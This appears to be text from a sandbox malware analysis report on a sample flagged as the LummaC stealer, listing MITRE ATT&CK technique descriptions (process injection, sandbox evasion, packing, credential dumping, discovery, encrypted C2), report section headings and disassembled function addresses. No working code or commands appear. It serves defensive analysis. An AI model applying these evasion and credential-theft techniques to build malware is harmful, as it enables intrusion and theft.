Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
file.exe

Function 00EE15F0 Relevance: 28.1, Strings: 22, Instructions: 608
COMMON

Function 00EF6F90 Relevance: 25.1, APIs: 5, Strings: 9, Instructions: 579
memoryCOMMON

Function 00ECE2A9 Relevance: 12.5, APIs: 1, Strings: 7, Instructions: 531
COMMON

Function 00ECA960 Relevance: 9.2, Strings: 7, Instructions: 401
COMMON

Function 00ECCE55 Relevance: 9.0, Strings: 7, Instructions: 275
COMMON

Function 00EE33A0 Relevance: 8.0, Strings: 6, Instructions: 472
COMMON

Function 00EEBFDA Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 461
COMMON

Function 00EF6C40 Relevance: 6.5, Strings: 5, Instructions: 265
COMMON

Function 00ECC36E Relevance: 6.5, Strings: 5, Instructions: 203
COMMON

Function 00EEC6D7 Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 614
COMMON

Function 00EEBFD3 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 456
COMMON

Function 00EC97B0 Relevance: 5.4, Strings: 4, Instructions: 396
COMMON

Function 00EE6170 Relevance: 5.3, Strings: 4, Instructions: 318
COMMON

Function 00EC87F0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 146
COMMON